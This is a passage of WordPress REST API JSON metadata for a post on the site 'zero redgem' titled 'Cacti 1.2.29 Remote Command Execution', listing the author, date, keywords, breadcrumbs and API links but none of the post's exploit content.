minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=29319#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=29319"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534","datePublished":"2025-12-08T09:42:02+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=29319"},"wordCount":2340,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=29319#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=29319","url":"https:\/\/zero.redgem.net\/?p=29319","name":"\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-08T09:42:02+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=29319#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=29319"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=29319#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Cacti 1.2.29 Remote Command Execution_PACKETSTORM:212534"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29319","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=29319"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29319\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=29319"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=29319"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=29319"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}